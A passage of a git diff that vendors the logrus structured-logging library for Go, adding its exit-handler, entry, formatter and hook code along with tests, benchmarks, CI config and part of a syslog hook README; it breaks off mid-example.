subject to the following conditions: +// +// The above copyright notice and this permission notice shall be included in all +// copies or substantial portions of the Software. 
+// +// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS +// FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR +// COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER +// IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN +// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +import ( + "fmt" + "os" +) + +var handlers = []func(){} + +func runHandler(handler func()) { + defer func() { + if err := recover(); err != nil { + fmt.Fprintln(os.Stderr, "Error: Logrus exit handler error:", err) + } + }() + + handler() +} + +func runHandlers() { + for _, handler := range handlers { + runHandler(handler) + } +} + +// Exit runs all the Logrus atexit handlers and then terminates the program using os.Exit(code) +func Exit(code int) { + runHandlers() + os.Exit(code) +} + +// RegisterExitHandler adds a Logrus Exit handler, call logrus.Exit to invoke +// all handlers. The handlers will also be invoked when any Fatal log entry is +// made. +// +// This method is useful when a caller wishes to use logrus to log a fatal +// message but also needs to gracefully shutdown. An example usecase could be +// closing database connections, or sending a alert that the application is +// closing. 
+func RegisterExitHandler(handler func()) { + handlers = append(handlers, handler) +} diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit_test.go b/vendor/github.com/Sirupsen/logrus/alt_exit_test.go new file mode 100644 index 0000000000..a08b1a898f --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/alt_exit_test.go @@ -0,0 +1,83 @@ +package logrus + +import ( + "io/ioutil" + "log" + "os" + "os/exec" + "path/filepath" + "testing" + "time" +) + +func TestRegister(t *testing.T) { + current := len(handlers) + RegisterExitHandler(func() {}) + if len(handlers) != current+1 { + t.Fatalf("expected %d handlers, got %d", current+1, len(handlers)) + } +} + +func TestHandler(t *testing.T) { + tempDir, err := ioutil.TempDir("", "test_handler") + if err != nil { + log.Fatalf("can't create temp dir. %q", err) + } + defer os.RemoveAll(tempDir) + + gofile := filepath.Join(tempDir, "gofile.go") + if err := ioutil.WriteFile(gofile, testprog, 0666); err != nil { + t.Fatalf("can't create go file. %q", err) + } + + outfile := filepath.Join(tempDir, "outfile.out") + arg := time.Now().UTC().String() + err = exec.Command("go", "run", gofile, outfile, arg).Run() + if err == nil { + t.Fatalf("completed normally, should have failed") + } + + data, err := ioutil.ReadFile(outfile) + if err != nil { + t.Fatalf("can't read output file %s. %q", outfile, err) + } + + if string(data) != arg { + t.Fatalf("bad data. Expected %q, got %q", data, arg) + } +} + +var testprog = []byte(` +// Test program for atexit, gets output file and data as arguments and writes +// data to output file in atexit handler. 
+package main + +import ( + "github.com/sirupsen/logrus" + "flag" + "fmt" + "io/ioutil" +) + +var outfile = "" +var data = "" + +func handler() { + ioutil.WriteFile(outfile, []byte(data), 0666) +} + +func badHandler() { + n := 0 + fmt.Println(1/n) +} + +func main() { + flag.Parse() + outfile = flag.Arg(0) + data = flag.Arg(1) + + logrus.RegisterExitHandler(handler) + logrus.RegisterExitHandler(badHandler) + logrus.Fatal("Bye bye") +} +`) diff --git a/vendor/github.com/Sirupsen/logrus/appveyor.yml b/vendor/github.com/Sirupsen/logrus/appveyor.yml new file mode 100644 index 0000000000..96c2ce15f8 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/appveyor.yml @@ -0,0 +1,14 @@ +version: "{build}" +platform: x64 +clone_folder: c:\gopath\src\github.com\sirupsen\logrus +environment: + GOPATH: c:\gopath +branches: + only: + - master +install: + - set PATH=%GOPATH%\bin;c:\go\bin;%PATH% + - go version +build_script: + - go get -t + - go test diff --git a/vendor/github.com/Sirupsen/logrus/doc.go b/vendor/github.com/Sirupsen/logrus/doc.go new file mode 100644 index 0000000000..da67aba06d --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/doc.go @@ -0,0 +1,26 @@ +/* +Package logrus is a structured logger for Go, completely API compatible with the standard library logger. 
+ + +The simplest way to use Logrus is simply the package-level exported logger: + + package main + + import ( + log "github.com/sirupsen/logrus" + ) + + func main() { + log.WithFields(log.Fields{ + "animal": "walrus", + "number": 1, + "size": 10, + }).Info("A walrus appears") + } + +Output: + time="2015-09-07T08:48:33Z" level=info msg="A walrus appears" animal=walrus number=1 size=10 + +For a full guide visit https://github.com/sirupsen/logrus +*/ +package logrus diff --git a/vendor/github.com/Sirupsen/logrus/entry.go b/vendor/github.com/Sirupsen/logrus/entry.go new file mode 100644 index 0000000000..778f4c9f0d --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/entry.go @@ -0,0 +1,288 @@ +package logrus + +import ( + "bytes" + "fmt" + "os" + "sync" + "time" +) + +var bufferPool *sync.Pool + +func init() { + bufferPool = &sync.Pool{ + New: func() interface{} { + return new(bytes.Buffer) + }, + } +} + +// Defines the key when adding errors using WithError. +var ErrorKey = "error" + +// An entry is the final or intermediate Logrus logging entry. It contains all +// the fields passed with WithField{,s}. It's finally logged when Debug, Info, +// Warn, Error, Fatal or Panic is called on it. These objects can be reused and +// passed around as much as you wish to avoid field duplication. +type Entry struct { + Logger *Logger + + // Contains all the fields set by the user. + Data Fields + + // Time at which the log entry was created + Time time.Time + + // Level the log entry was logged at: Debug, Info, Warn, Error, Fatal or Panic + // This field will be set on entry firing and the value will be equal to the one in Logger struct field. 
+ Level Level + + // Message passed to Debug, Info, Warn, Error, Fatal or Panic + Message string + + // When formatter is called in entry.log(), an Buffer may be set to entry + Buffer *bytes.Buffer +} + +func NewEntry(logger *Logger) *Entry { + return &Entry{ + Logger: logger, + // Default is three fields, give a little extra room + Data: make(Fields, 5), + } +} + +// Returns the string representation from the reader and ultimately the +// formatter. +func (entry *Entry) String() (string, error) { + serialized, err := entry.Logger.Formatter.Format(entry) + if err != nil { + return "", err + } + str := string(serialized) + return str, nil +} + +// Add an error as single field (using the key defined in ErrorKey) to the Entry. +func (entry *Entry) WithError(err error) *Entry { + return entry.WithField(ErrorKey, err) +} + +// Add a single field to the Entry. +func (entry *Entry) WithField(key string, value interface{}) *Entry { + return entry.WithFields(Fields{key: value}) +} + +// Add a map of fields to the Entry. +func (entry *Entry) WithFields(fields Fields) *Entry { + data := make(Fields, len(entry.Data)+len(fields)) + for k, v := range entry.Data { + data[k] = v + } + for k, v := range fields { + data[k] = v + } + return &Entry{Logger: entry.Logger, Data: data} +} + +// This function is not declared with a pointer value because otherwise +// race conditions will occur when using multiple goroutines +func (entry Entry) log(level Level, msg string) { + var buffer *bytes.Buffer + entry.Time = time.Now() + entry.Level = level + entry.Message = msg + + entry.fireHooks() + + buffer = bufferPool.Get().(*bytes.Buffer) + buffer.Reset() + defer bufferPool.Put(buffer) + entry.Buffer = buffer + + entry.write() + + entry.Buffer = nil + + // To avoid Entry#log() returning a value that only would make sense for + // panic() to use in Entry#Panic(), we avoid the allocation by checking + // directly here. 
+ if level <= PanicLevel { + panic(&entry) + } +} + +// This function is not declared with a pointer value because otherwise +// race conditions will occur when using multiple goroutines +func (entry Entry) fireHooks() { + entry.Logger.mu.Lock() + defer entry.Logger.mu.Unlock() + err := entry.Logger.Hooks.Fire(entry.Level, &entry) + if err != nil { + fmt.Fprintf(os.Stderr, "Failed to fire hook: %v\n", err) + } +} + +func (entry *Entry) write() { + serialized, err := entry.Logger.Formatter.Format(entry) + entry.Logger.mu.Lock() + defer entry.Logger.mu.Unlock() + if err != nil { + fmt.Fprintf(os.Stderr, "Failed to obtain reader, %v\n", err) + } else { + _, err = entry.Logger.Out.Write(serialized) + if err != nil { + fmt.Fprintf(os.Stderr, "Failed to write to log, %v\n", err) + } + } +} + +func (entry *Entry) Debug(args ...interface{}) { + if entry.Logger.level() >= DebugLevel { + entry.log(DebugLevel, fmt.Sprint(args...)) + } +} + +func (entry *Entry) Print(args ...interface{}) { + entry.Info(args...) +} + +func (entry *Entry) Info(args ...interface{}) { + if entry.Logger.level() >= InfoLevel { + entry.log(InfoLevel, fmt.Sprint(args...)) + } +} + +func (entry *Entry) Warn(args ...interface{}) { + if entry.Logger.level() >= WarnLevel { + entry.log(WarnLevel, fmt.Sprint(args...)) + } +} + +func (entry *Entry) Warning(args ...interface{}) { + entry.Warn(args...) 
+} + +func (entry *Entry) Error(args ...interface{}) { + if entry.Logger.level() >= ErrorLevel { + entry.log(ErrorLevel, fmt.Sprint(args...)) + } +} + +func (entry *Entry) Fatal(args ...interface{}) { + if entry.Logger.level() >= FatalLevel { + entry.log(FatalLevel, fmt.Sprint(args...)) + } + Exit(1) +} + +func (entry *Entry) Panic(args ...interface{}) { + if entry.Logger.level() >= PanicLevel { + entry.log(PanicLevel, fmt.Sprint(args...)) + } + panic(fmt.Sprint(args...)) +} + +// Entry Printf family functions + +func (entry *Entry) Debugf(format string, args ...interface{}) { + if entry.Logger.level() >= DebugLevel { + entry.Debug(fmt.Sprintf(format, args...)) + } +} + +func (entry *Entry) Infof(format string, args ...interface{}) { + if entry.Logger.level() >= InfoLevel { + entry.Info(fmt.Sprintf(format, args...)) + } +} + +func (entry *Entry) Printf(format string, args ...interface{}) { + entry.Infof(format, args...) +} + +func (entry *Entry) Warnf(format string, args ...interface{}) { + if entry.Logger.level() >= WarnLevel { + entry.Warn(fmt.Sprintf(format, args...)) + } +} + +func (entry *Entry) Warningf(format string, args ...interface{}) { + entry.Warnf(format, args...) 
+} + +func (entry *Entry) Errorf(format string, args ...interface{}) { + if entry.Logger.level() >= ErrorLevel { + entry.Error(fmt.Sprintf(format, args...)) + } +} + +func (entry *Entry) Fatalf(format string, args ...interface{}) { + if entry.Logger.level() >= FatalLevel { + entry.Fatal(fmt.Sprintf(format, args...)) + } + Exit(1) +} + +func (entry *Entry) Panicf(format string, args ...interface{}) { + if entry.Logger.level() >= PanicLevel { + entry.Panic(fmt.Sprintf(format, args...)) + } +} + +// Entry Println family functions + +func (entry *Entry) Debugln(args ...interface{}) { + if entry.Logger.level() >= DebugLevel { + entry.Debug(entry.sprintlnn(args...)) + } +} + +func (entry *Entry) Infoln(args ...interface{}) { + if entry.Logger.level() >= InfoLevel { + entry.Info(entry.sprintlnn(args...)) + } +} + +func (entry *Entry) Println(args ...interface{}) { + entry.Infoln(args...) +} + +func (entry *Entry) Warnln(args ...interface{}) { + if entry.Logger.level() >= WarnLevel { + entry.Warn(entry.sprintlnn(args...)) + } +} + +func (entry *Entry) Warningln(args ...interface{}) { + entry.Warnln(args...) +} + +func (entry *Entry) Errorln(args ...interface{}) { + if entry.Logger.level() >= ErrorLevel { + entry.Error(entry.sprintlnn(args...)) + } +} + +func (entry *Entry) Fatalln(args ...interface{}) { + if entry.Logger.level() >= FatalLevel { + entry.Fatal(entry.sprintlnn(args...)) + } + Exit(1) +} + +func (entry *Entry) Panicln(args ...interface{}) { + if entry.Logger.level() >= PanicLevel { + entry.Panic(entry.sprintlnn(args...)) + } +} + +// Sprintlnn => Sprint no newline. This is to get the behavior of how +// fmt.Sprintln where spaces are always added between operands, regardless of +// their type. Instead of vendoring the Sprintln implementation to spare a +// string allocation, we do the simplest thing. +func (entry *Entry) sprintlnn(args ...interface{}) string { + msg := fmt.Sprintln(args...) 
+ return msg[:len(msg)-1] +} diff --git a/vendor/github.com/Sirupsen/logrus/entry_test.go b/vendor/github.com/Sirupsen/logrus/entry_test.go new file mode 100644 index 0000000000..a81e2b3834 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/entry_test.go @@ -0,0 +1,115 @@ +package logrus + +import ( + "bytes" + "fmt" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestEntryWithError(t *testing.T) { + + assert := assert.New(t) + + defer func() { + ErrorKey = "error" + }() + + err := fmt.Errorf("kaboom at layer %d", 4711) + + assert.Equal(err, WithError(err).Data["error"]) + + logger := New() + logger.Out = &bytes.Buffer{} + entry := NewEntry(logger) + + assert.Equal(err, entry.WithError(err).Data["error"]) + + ErrorKey = "err" + + assert.Equal(err, entry.WithError(err).Data["err"]) + +} + +func TestEntryPanicln(t *testing.T) { + errBoom := fmt.Errorf("boom time") + + defer func() { + p := recover() + assert.NotNil(t, p) + + switch pVal := p.(type) { + case *Entry: + assert.Equal(t, "kaboom", pVal.Message) + assert.Equal(t, errBoom, pVal.Data["err"]) + default: + t.Fatalf("want type *Entry, got %T: %#v", pVal, pVal) + } + }() + + logger := New() + logger.Out = &bytes.Buffer{} + entry := NewEntry(logger) + entry.WithField("err", errBoom).Panicln("kaboom") +} + +func TestEntryPanicf(t *testing.T) { + errBoom := fmt.Errorf("boom again") + + defer func() { + p := recover() + assert.NotNil(t, p) + + switch pVal := p.(type) { + case *Entry: + assert.Equal(t, "kaboom true", pVal.Message) + assert.Equal(t, errBoom, pVal.Data["err"]) + default: + t.Fatalf("want type *Entry, got %T: %#v", pVal, pVal) + } + }() + + logger := New() + logger.Out = &bytes.Buffer{} + entry := NewEntry(logger) + entry.WithField("err", errBoom).Panicf("kaboom %v", true) +} + +const ( + badMessage = "this is going to panic" + panicMessage = "this is broken" +) + +type panickyHook struct{} + +func (p *panickyHook) Levels() []Level { + return []Level{InfoLevel} +} + +func (p 
*panickyHook) Fire(entry *Entry) error { + if entry.Message == badMessage { + panic(panicMessage) + } + + return nil +} + +func TestEntryHooksPanic(t *testing.T) { + logger := New() + logger.Out = &bytes.Buffer{} + logger.Level = InfoLevel + logger.Hooks.Add(&panickyHook{}) + + defer func() { + p := recover() + assert.NotNil(t, p) + assert.Equal(t, panicMessage, p) + + entry := NewEntry(logger) + entry.Info("another message") + }() + + entry := NewEntry(logger) + entry.Info(badMessage) +} diff --git a/vendor/github.com/Sirupsen/logrus/example_basic_test.go b/vendor/github.com/Sirupsen/logrus/example_basic_test.go new file mode 100644 index 0000000000..a2acf550c9 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/example_basic_test.go @@ -0,0 +1,69 @@ +package logrus_test + +import ( + "github.com/sirupsen/logrus" + "os" +) + +func Example_basic() { + var log = logrus.New() + log.Formatter = new(logrus.JSONFormatter) + log.Formatter = new(logrus.TextFormatter) //default + log.Formatter.(*logrus.TextFormatter).DisableTimestamp = true // remove timestamp from test output + log.Level = logrus.DebugLevel + log.Out = os.Stdout + + // file, err := os.OpenFile("logrus.log", os.O_CREATE|os.O_WRONLY, 0666) + // if err == nil { + // log.Out = file + // } else { + // log.Info("Failed to log to file, using default stderr") + // } + + defer func() { + err := recover() + if err != nil { + entry := err.(*logrus.Entry) + log.WithFields(logrus.Fields{ + "omg": true, + "err_animal": entry.Data["animal"], + "err_size": entry.Data["size"], + "err_level": entry.Level, + "err_message": entry.Message, + "number": 100, + }).Error("The ice breaks!") // or use Fatal() to force the process to exit with a nonzero code + } + }() + + log.WithFields(logrus.Fields{ + "animal": "walrus", + "number": 8, + }).Debug("Started observing beach") + + log.WithFields(logrus.Fields{ + "animal": "walrus", + "size": 10, + }).Info("A group of walrus emerges from the ocean") + + log.WithFields(logrus.Fields{ 
+ "omg": true, + "number": 122, + }).Warn("The group's number increased tremendously!") + + log.WithFields(logrus.Fields{ + "temperature": -4, + }).Debug("Temperature changes") + + log.WithFields(logrus.Fields{ + "animal": "orca", + "size": 9009, + }).Panic("It's over 9000!") + + // Output: + // level=debug msg="Started observing beach" animal=walrus number=8 + // level=info msg="A group of walrus emerges from the ocean" animal=walrus size=10 + // level=warning msg="The group's number increased tremendously!" number=122 omg=true + // level=debug msg="Temperature changes" temperature=-4 + // level=panic msg="It's over 9000!" animal=orca size=9009 + // level=error msg="The ice breaks!" err_animal=orca err_level=panic err_message="It's over 9000!" err_size=9009 number=100 omg=true +} diff --git a/vendor/github.com/Sirupsen/logrus/example_hook_test.go b/vendor/github.com/Sirupsen/logrus/example_hook_test.go new file mode 100644 index 0000000000..d4ddffca37 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/example_hook_test.go @@ -0,0 +1,35 @@ +package logrus_test + +import ( + "github.com/sirupsen/logrus" + "gopkg.in/gemnasium/logrus-airbrake-hook.v2" + "os" +) + +func Example_hook() { + var log = logrus.New() + log.Formatter = new(logrus.TextFormatter) // default + log.Formatter.(*logrus.TextFormatter).DisableTimestamp = true // remove timestamp from test output + log.Hooks.Add(airbrake.NewHook(123, "xyz", "development")) + log.Out = os.Stdout + + log.WithFields(logrus.Fields{ + "animal": "walrus", + "size": 10, + }).Info("A group of walrus emerges from the ocean") + + log.WithFields(logrus.Fields{ + "omg": true, + "number": 122, + }).Warn("The group's number increased tremendously!") + + log.WithFields(logrus.Fields{ + "omg": true, + "number": 100, + }).Error("The ice breaks!") + + // Output: + // level=info msg="A group of walrus emerges from the ocean" animal=walrus size=10 + // level=warning msg="The group's number increased tremendously!" 
number=122 omg=true + // level=error msg="The ice breaks!" number=100 omg=true +} diff --git a/vendor/github.com/Sirupsen/logrus/exported.go b/vendor/github.com/Sirupsen/logrus/exported.go new file mode 100644 index 0000000000..013183edab --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/exported.go @@ -0,0 +1,193 @@ +package logrus + +import ( + "io" +) + +var ( + // std is the name of the standard logger in stdlib `log` + std = New() +) + +func StandardLogger() *Logger { + return std +} + +// SetOutput sets the standard logger output. +func SetOutput(out io.Writer) { + std.mu.Lock() + defer std.mu.Unlock() + std.Out = out +} + +// SetFormatter sets the standard logger formatter. +func SetFormatter(formatter Formatter) { + std.mu.Lock() + defer std.mu.Unlock() + std.Formatter = formatter +} + +// SetLevel sets the standard logger level. +func SetLevel(level Level) { + std.mu.Lock() + defer std.mu.Unlock() + std.SetLevel(level) +} + +// GetLevel returns the standard logger level. +func GetLevel() Level { + std.mu.Lock() + defer std.mu.Unlock() + return std.level() +} + +// AddHook adds a hook to the standard logger hooks. +func AddHook(hook Hook) { + std.mu.Lock() + defer std.mu.Unlock() + std.Hooks.Add(hook) +} + +// WithError creates an entry from the standard logger and adds an error to it, using the value defined in ErrorKey as key. +func WithError(err error) *Entry { + return std.WithField(ErrorKey, err) +} + +// WithField creates an entry from the standard logger and adds a field to +// it. If you want multiple fields, use `WithFields`. +// +// Note that it doesn't log until you call Debug, Print, Info, Warn, Fatal +// or Panic on the Entry it returns. +func WithField(key string, value interface{}) *Entry { + return std.WithField(key, value) +} + +// WithFields creates an entry from the standard logger and adds multiple +// fields to it. This is simply a helper for `WithField`, invoking it +// once for each field. 
+// +// Note that it doesn't log until you call Debug, Print, Info, Warn, Fatal +// or Panic on the Entry it returns. +func WithFields(fields Fields) *Entry { + return std.WithFields(fields) +} + +// Debug logs a message at level Debug on the standard logger. +func Debug(args ...interface{}) { + std.Debug(args...) +} + +// Print logs a message at level Info on the standard logger. +func Print(args ...interface{}) { + std.Print(args...) +} + +// Info logs a message at level Info on the standard logger. +func Info(args ...interface{}) { + std.Info(args...) +} + +// Warn logs a message at level Warn on the standard logger. +func Warn(args ...interface{}) { + std.Warn(args...) +} + +// Warning logs a message at level Warn on the standard logger. +func Warning(args ...interface{}) { + std.Warning(args...) +} + +// Error logs a message at level Error on the standard logger. +func Error(args ...interface{}) { + std.Error(args...) +} + +// Panic logs a message at level Panic on the standard logger. +func Panic(args ...interface{}) { + std.Panic(args...) +} + +// Fatal logs a message at level Fatal on the standard logger. +func Fatal(args ...interface{}) { + std.Fatal(args...) +} + +// Debugf logs a message at level Debug on the standard logger. +func Debugf(format string, args ...interface{}) { + std.Debugf(format, args...) +} + +// Printf logs a message at level Info on the standard logger. +func Printf(format string, args ...interface{}) { + std.Printf(format, args...) +} + +// Infof logs a message at level Info on the standard logger. +func Infof(format string, args ...interface{}) { + std.Infof(format, args...) +} + +// Warnf logs a message at level Warn on the standard logger. +func Warnf(format string, args ...interface{}) { + std.Warnf(format, args...) +} + +// Warningf logs a message at level Warn on the standard logger. +func Warningf(format string, args ...interface{}) { + std.Warningf(format, args...) 
+} + +// Errorf logs a message at level Error on the standard logger. +func Errorf(format string, args ...interface{}) { + std.Errorf(format, args...) +} + +// Panicf logs a message at level Panic on the standard logger. +func Panicf(format string, args ...interface{}) { + std.Panicf(format, args...) +} + +// Fatalf logs a message at level Fatal on the standard logger. +func Fatalf(format string, args ...interface{}) { + std.Fatalf(format, args...) +} + +// Debugln logs a message at level Debug on the standard logger. +func Debugln(args ...interface{}) { + std.Debugln(args...) +} + +// Println logs a message at level Info on the standard logger. +func Println(args ...interface{}) { + std.Println(args...) +} + +// Infoln logs a message at level Info on the standard logger. +func Infoln(args ...interface{}) { + std.Infoln(args...) +} + +// Warnln logs a message at level Warn on the standard logger. +func Warnln(args ...interface{}) { + std.Warnln(args...) +} + +// Warningln logs a message at level Warn on the standard logger. +func Warningln(args ...interface{}) { + std.Warningln(args...) +} + +// Errorln logs a message at level Error on the standard logger. +func Errorln(args ...interface{}) { + std.Errorln(args...) +} + +// Panicln logs a message at level Panic on the standard logger. +func Panicln(args ...interface{}) { + std.Panicln(args...) +} + +// Fatalln logs a message at level Fatal on the standard logger. +func Fatalln(args ...interface{}) { + std.Fatalln(args...) +} diff --git a/vendor/github.com/Sirupsen/logrus/formatter.go b/vendor/github.com/Sirupsen/logrus/formatter.go new file mode 100644 index 0000000000..b183ff5b1d --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/formatter.go @@ -0,0 +1,45 @@ +package logrus + +import "time" + +const defaultTimestampFormat = time.RFC3339 + +// The Formatter interface is used to implement a custom Formatter. It takes an +// `Entry`. 
It exposes all the fields, including the default ones: +// +// * `entry.Data["msg"]`. The message passed from Info, Warn, Error .. +// * `entry.Data["time"]`. The timestamp. +// * `entry.Data["level"]. The level the entry was logged at. +// +// Any additional fields added with `WithField` or `WithFields` are also in +// `entry.Data`. Format is expected to return an array of bytes which are then +// logged to `logger.Out`. +type Formatter interface { + Format(*Entry) ([]byte, error) +} + +// This is to not silently overwrite `time`, `msg` and `level` fields when +// dumping it. If this code wasn't there doing: +// +// logrus.WithField("level", 1).Info("hello") +// +// Would just silently drop the user provided level. Instead with this code +// it'll logged as: +// +// {"level": "info", "fields.level": 1, "msg": "hello", "time": "..."} +// +// It's not exported because it's still using Data in an opinionated way. It's to +// avoid code duplication between the two default formatters. +func prefixFieldClashes(data Fields) { + if t, ok := data["time"]; ok { + data["fields.time"] = t + } + + if m, ok := data["msg"]; ok { + data["fields.msg"] = m + } + + if l, ok := data["level"]; ok { + data["fields.level"] = l + } +} diff --git a/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go b/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go new file mode 100644 index 0000000000..d9481589f5 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go @@ -0,0 +1,101 @@ +package logrus + +import ( + "fmt" + "testing" + "time" +) + +// smallFields is a small size data set for benchmarking +var smallFields = Fields{ + "foo": "bar", + "baz": "qux", + "one": "two", + "three": "four", +} + +// largeFields is a large size data set for benchmarking +var largeFields = Fields{ + "foo": "bar", + "baz": "qux", + "one": "two", + "three": "four", + "five": "six", + "seven": "eight", + "nine": "ten", + "eleven": "twelve", + "thirteen": "fourteen", + "fifteen": 
"sixteen", + "seventeen": "eighteen", + "nineteen": "twenty", + "a": "b", + "c": "d", + "e": "f", + "g": "h", + "i": "j", + "k": "l", + "m": "n", + "o": "p", + "q": "r", + "s": "t", + "u": "v", + "w": "x", + "y": "z", + "this": "will", + "make": "thirty", + "entries": "yeah", +} + +var errorFields = Fields{ + "foo": fmt.Errorf("bar"), + "baz": fmt.Errorf("qux"), +} + +func BenchmarkErrorTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{DisableColors: true}, errorFields) +} + +func BenchmarkSmallTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{DisableColors: true}, smallFields) +} + +func BenchmarkLargeTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{DisableColors: true}, largeFields) +} + +func BenchmarkSmallColoredTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{ForceColors: true}, smallFields) +} + +func BenchmarkLargeColoredTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{ForceColors: true}, largeFields) +} + +func BenchmarkSmallJSONFormatter(b *testing.B) { + doBenchmark(b, &JSONFormatter{}, smallFields) +} + +func BenchmarkLargeJSONFormatter(b *testing.B) { + doBenchmark(b, &JSONFormatter{}, largeFields) +} + +func doBenchmark(b *testing.B, formatter Formatter, fields Fields) { + logger := New() + + entry := &Entry{ + Time: time.Time{}, + Level: InfoLevel, + Message: "message", + Data: fields, + Logger: logger, + } + var d []byte + var err error + for i := 0; i < b.N; i++ { + d, err = formatter.Format(entry) + if err != nil { + b.Fatal(err) + } + b.SetBytes(int64(len(d))) + } +} diff --git a/vendor/github.com/Sirupsen/logrus/hook_test.go b/vendor/github.com/Sirupsen/logrus/hook_test.go new file mode 100644 index 0000000000..4fea7514e1 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hook_test.go @@ -0,0 +1,144 @@ +package logrus + +import ( + "sync" + "testing" + + "github.com/stretchr/testify/assert" +) + +type TestHook struct { + Fired bool +} + +func (hook *TestHook) Fire(entry *Entry) 
error { + hook.Fired = true + return nil +} + +func (hook *TestHook) Levels() []Level { + return []Level{ + DebugLevel, + InfoLevel, + WarnLevel, + ErrorLevel, + FatalLevel, + PanicLevel, + } +} + +func TestHookFires(t *testing.T) { + hook := new(TestHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook) + assert.Equal(t, hook.Fired, false) + + log.Print("test") + }, func(fields Fields) { + assert.Equal(t, hook.Fired, true) + }) +} + +type ModifyHook struct { +} + +func (hook *ModifyHook) Fire(entry *Entry) error { + entry.Data["wow"] = "whale" + return nil +} + +func (hook *ModifyHook) Levels() []Level { + return []Level{ + DebugLevel, + InfoLevel, + WarnLevel, + ErrorLevel, + FatalLevel, + PanicLevel, + } +} + +func TestHookCanModifyEntry(t *testing.T) { + hook := new(ModifyHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook) + log.WithField("wow", "elephant").Print("test") + }, func(fields Fields) { + assert.Equal(t, fields["wow"], "whale") + }) +} + +func TestCanFireMultipleHooks(t *testing.T) { + hook1 := new(ModifyHook) + hook2 := new(TestHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook1) + log.Hooks.Add(hook2) + + log.WithField("wow", "elephant").Print("test") + }, func(fields Fields) { + assert.Equal(t, fields["wow"], "whale") + assert.Equal(t, hook2.Fired, true) + }) +} + +type ErrorHook struct { + Fired bool +} + +func (hook *ErrorHook) Fire(entry *Entry) error { + hook.Fired = true + return nil +} + +func (hook *ErrorHook) Levels() []Level { + return []Level{ + ErrorLevel, + } +} + +func TestErrorHookShouldntFireOnInfo(t *testing.T) { + hook := new(ErrorHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook) + log.Info("test") + }, func(fields Fields) { + assert.Equal(t, hook.Fired, false) + }) +} + +func TestErrorHookShouldFireOnError(t *testing.T) { + hook := new(ErrorHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook) + log.Error("test") + }, func(fields 
Fields) { + assert.Equal(t, hook.Fired, true) + }) +} + +func TestAddHookRace(t *testing.T) { + var wg sync.WaitGroup + wg.Add(2) + hook := new(ErrorHook) + LogAndAssertJSON(t, func(log *Logger) { + go func() { + defer wg.Done() + log.AddHook(hook) + }() + go func() { + defer wg.Done() + log.Error("test") + }() + wg.Wait() + }, func(fields Fields) { + // the line may have been logged + // before the hook was added, so we can't + // actually assert on the hook + }) +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks.go b/vendor/github.com/Sirupsen/logrus/hooks.go new file mode 100644 index 0000000000..3f151cdc39 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks.go @@ -0,0 +1,34 @@ +package logrus + +// A hook to be fired when logging on the logging levels returned from +// `Levels()` on your implementation of the interface. Note that this is not +// fired in a goroutine or a channel with workers, you should handle such +// functionality yourself if your call is non-blocking and you don't wish for +// the logging calls for levels returned from `Levels()` to block. +type Hook interface { + Levels() []Level + Fire(*Entry) error +} + +// Internal type for storing the hooks on a logger instance. +type LevelHooks map[Level][]Hook + +// Add a hook to an instance of logger. This is called with +// `log.Hooks.Add(new(MyHook))` where `MyHook` implements the `Hook` interface. +func (hooks LevelHooks) Add(hook Hook) { + for _, level := range hook.Levels() { + hooks[level] = append(hooks[level], hook) + } +} + +// Fire all the hooks for the passed level. Used by `entry.log` to fire +// appropriate hooks for a log entry. 
+func (hooks LevelHooks) Fire(level Level, entry *Entry) error { + for _, hook := range hooks[level] { + if err := hook.Fire(entry); err != nil { + return err + } + } + + return nil +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md b/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md new file mode 100644 index 0000000000..1bbc0f72d3 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md @@ -0,0 +1,39 @@ +# Syslog Hooks for Logrus :walrus: + +## Usage + +```go +import ( + "log/syslog" + "github.com/sirupsen/logrus" + lSyslog "github.com/sirupsen/logrus/hooks/syslog" +) + +func main() { + log := logrus.New() + hook, err := lSyslog.NewSyslogHook("udp", "localhost:514", syslog.LOG_INFO, "") + + if err == nil { + log.Hooks.Add(hook) + } +} +``` + +If you want to connect to local syslog (Ex. "/dev/log" or "/var/run/syslog" or "/var/run/log"). Just assign empty string to the first two parameters of `NewSyslogHook`. It should look like the following. + +```go +import ( + "log/syslog" + "github.com/sirupsen/logrus" + lSyslog "github.com/sirupsen/logrus/hooks/syslog" +) + +func main() { + log := logrus.New() + hook, err := 